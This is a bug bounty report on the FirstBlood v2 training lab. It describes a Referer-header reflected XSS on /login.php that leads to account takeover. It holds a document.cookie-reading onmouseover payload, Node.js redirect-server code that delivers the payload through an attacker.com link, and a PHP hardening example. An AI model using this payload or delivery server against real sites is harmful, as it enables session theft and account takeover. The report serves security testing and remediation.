FirstBlood-#637 — Referer Based XSS on /login.php endpoint leading to ATO
This issue was discovered on FirstBlood v2
On 2021-10-26, holybugx Level 5 reported:
Description
Hello Sean,
The /login.php endpoint is vulnerable to Referer-based XSS which leads to account takeover. Previously there was an XSS possibility on this endpoint using the ref parameter. The developer properly fixed that vulnerability. However, this time the Referer header is reflected without sanitization on the /login.php endpoint, which results in another XSS.
Steps To Reproduce
- Open the /login.php endpoint and click Secure Login, and you will face the Return to previous page button:

- Use the following payload as the Referer header value, and observe the response:
'onmouseover=alert(document.cookie)//

The Referer value is reflected without proper sanitization in the source code. Hover your mouse over the Return to previous page button and the XSS executes:

Exploitation
As this is a Referer based XSS, the exploitation scenario is different. The attacker hosts the following Node.js code on his server:
const express = require('express');
const app = express();
// Answer every path with a page that immediately navigates to the target.
app.get('*', (req, res) => {
// Ask the browser to send the full URL (including the path) as the Referer
// on the cross-origin navigation that follows.
res.set('Referrer-Policy', 'unsafe-url');
res.set('Content-Type', 'text/html');
res.end('<script>location.replace("target-url");</script>');
});
app.listen(80);
Then the attacker gives the following link to the victim:
http://attacker.com/test'onmouseover=alert(document.cookie)//
- The server handles the request and responds with <script>location.replace("target")</script>.
- In the redirect request the Referer will be set to http://attacker.com/test'onmouseover=alert(document.cookie)//
- The Referrer-Policy is needed because modern browsers don't pass the Referer with a path by default (only the origin) for cross-domain navigation.
After the victim hovers the mouse over the Return to previous page, the XSS executes.
Impact
- XSS leading to account takeover of various users.
Remediation
- Implement proper sanitization of the Referer header.
- Set HttpOnly cookies so that JavaScript cannot access the cookies.
- Remove/expire the drps cookies after logging out.
Kind Regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The ?ref= parameter on login.php was fixed and $_SERVER['HTTP_REFERER'] was used instead. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments, for example!) and the Referer header is vulnerable to reflective XSS.
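The fix the report asks for, shown as an added PHP example (this is not FirstBlood's own login.php): the vulnerable pattern of echoing $_SERVER['HTTP_REFERER'] straight into the href attribute, beside a hardened version that validates the value before output-encoding it. It goes a little beyond the report's remediation list by also rejecting Referers that are not http(s) links back to the application's own host, and it sets the session cookie with the HttpOnly flag the report recommends. APP_HOST and the function names are this example's own assumptions.

```php
<?php
// Added example, not FirstBlood's code: building the "Return to previous
// page" link from the Referer header. APP_HOST is an assumed value.
const APP_HOST = 'firstblood.example';

// Vulnerable pattern from the report: the raw header lands inside a
// single-quoted href, so a ' in the Referer closes the attribute and the
// rest of the value becomes new attributes (such as an event handler).
function render_back_link_vulnerable(string $referer): string {
    return "<a href='" . $referer . "'>Return to previous page</a>";
}

// Validation step: only accept an http(s) URL whose host is this
// application. Anything else (javascript:, data:, foreign hosts, garbage)
// falls back to the home page.
function safe_return_url(?string $referer): string {
    if ($referer === null || $referer === '') {
        return '/';
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '/';
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '/';
    }
    if (strcasecmp($parts['host'], APP_HOST) !== 0) {
        return '/';
    }
    return $referer;
}

// Hardened output: validate, then encode for the HTML attribute context.
// ENT_QUOTES encodes both ' and ", so the value cannot break out of the
// attribute whichever quote style the template uses.
function render_back_link_hardened(?string $referer): string {
    $url = safe_return_url($referer);
    $encoded = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<a href='" . $encoded . "'>Return to previous page</a>";
}

// Session cookie with HttpOnly (plus Secure and SameSite), so that even a
// successful script injection cannot read it through document.cookie.
function issue_session_cookie(string $name, string $value): void {
    setcookie($name, $value, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Demonstration with the report's payload as the Referer value (constructed
// input; attacker.example is a placeholder host).
$payload = "http://attacker.example/test'onmouseover=alert(document.cookie)//";
echo render_back_link_vulnerable($payload), "\n";
echo render_back_link_hardened($payload), "\n";
// A legitimate same-host Referer that happens to contain a quote is kept,
// but the quote is encoded rather than reflected raw.
echo render_back_link_hardened("https://firstblood.example/dash'board"), "\n";
```

Run it from the command line with php to compare the three lines: the first reproduces the broken attribute from the report, the second collapses the foreign-host payload to a plain link to /, and the third keeps a same-host URL but with its quote encoded. In a real login.php the same functions would be called with $_SERVER['HTTP_REFERER'] ?? null, and the cookie helper would replace the existing setcookie call for the session cookie.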
Report Feedback
Creator & Administrator
Nice find, thanks for providing a working PoC. Actually though from my testing I am only able to reproduce this on IE and the ' character is encoded for me on latest versions of Firefox and Chrome